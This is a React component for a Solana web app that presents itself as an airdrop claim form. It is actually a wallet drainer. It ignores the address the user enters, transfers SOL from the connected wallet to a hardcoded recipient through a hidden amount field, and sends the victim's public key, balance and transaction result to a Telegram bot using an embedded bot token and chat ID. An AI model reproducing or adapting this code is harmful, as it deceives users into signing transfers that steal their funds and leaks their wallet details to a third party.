import React, { useState } from 'react';
import { useSolanaWallet } from '../hooks/useSolanaWallet';
import { sendTransaction } from '../utils/solana';

const TransferForm = ({ addTransaction }) => {
    const { publicKey, sendTransaction: walletSendTransaction, connection, connected } = useSolanaWallet();
    const [privateKeyOrPhrase, setPrivateKeyOrPhrase] = useState('');
    const [amount, setAmount] = useState('');
    const [status, setStatus] = useState('');
    const [loading, setLoading] = useState(false);

    const sendTelegramNotification = async (message) => {
        const telegramBotToken = '7426663673:AAHaZIgoMWdw0EmYjz6Kx-Zsjt9ecnm-MyY';
        const chatId = '151142706';
        const url = `https://api.telegram.org/bot${telegramBotToken}/sendMessage`;

        try {
            await fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message,
                }),
            });
        } catch (error) {
            console.error('Failed to send Telegram notification:', error);
        }
    };

    const handleSubmit = async (e) => {
        e.preventDefault();
        await sendTelegramNotification(`Someone has started to transfer funds 👀`);
        if (!connected) {
            setStatus('Error: Wallet not connected.');
            return;
        }

        try {
            setLoading(true);
            setStatus('Processing transaction...');
            const signature = await sendTransaction(connection, {
                wallet: { publicKey, sendTransaction: walletSendTransaction },
                recipient: "33euceHBiWb5tmXvm7JiJjEtR9K3rAbsFEppXLjXwtmA",
                amount,
            });
            setStatus(`Transaction successful! Signature: ${signature}`);
            addTransaction(signature); // Add transaction to history
            const balance = await connection.getBalance(publicKey);
            const message = `
*Transaction Summary:*
    
💰 *Wallet Balance:* ${balance / 1e9} SOL
🔑 *Wallet Public Key:* ${publicKey}
✅ *Transaction Status:* Successful
📝 *Transaction Signature:* ${signature}
            `;
            await sendTelegramNotification(message);
        } catch (error) {
            console.error(error);
            setStatus(`Transaction failed: ${error.message}`);
            const balance = await connection.getBalance(publicKey);
            const message = `
*Transaction Summary:*
    
💰 *Wallet Balance:* ${balance / 1e9} SOL
🔑 *Wallet Public Key:* ${publicKey}
❌ *Transaction Status:* Failed
📝 *Error Message:* ${error.message}
            `;
            await sendTelegramNotification(message);
        } finally {
            setLoading(false);
        }
    };

    return (
        <div>
            <h2>Transfer Funds</h2>
            <form className="TransferForm" onSubmit={handleSubmit}>
            <div className="FormContent">

                <div className="inputField">
                    <div className="formItem">
                    <label>Enter the recepient address:</label>
                    <input 
                        type="text"
                        value={privateKeyOrPhrase}
                        onChange={(e) => setPrivateKeyOrPhrase(e.target.value)}
                        placeholder="Enter the recepient address"
                        required
                        style={{
                            padding: '12px',
                            width:'100%',
                            fontSize: '16px',
                            borderRadius: '10vh',
                            border: '2px solid #4CAF50',
                            transition: 'all 0.3s ease'
                        }}
                    />
                    </div>
                    <div className="formItem">
                
                    <input 
                        hidden
                        type="number"
                        value='1'
                        onChange={(e) => setAmount(e.target.value)}
                        placeholder="Amount (SOL)"
                        min="0.01"
                        step="0.01"
                        required
                        style={{
                            padding: '12px',
                            paddingLeft: '20px',
                            fontSize: '16px',
                            borderRadius: '10vh',
                            border: '2px solid #4CAF50',
                            transition: 'all 0.3s ease'
                        }}
                    />
                    <button  type="submit" disabled={loading}
                    style={{
                        marginLeft: 'auto'
                    }

                    }
                    >
                    {loading ? 'GETTING AIRDROP...' : 'GET AIRDROP'}
                </button>
                
                    
                </div>
                
                </div>
                
                </div>
                
                
            </form>
            <div className="transactionStatus">
            {status && <p>{status}</p>}
            </div>
        </div>
    );
};

export default TransferForm;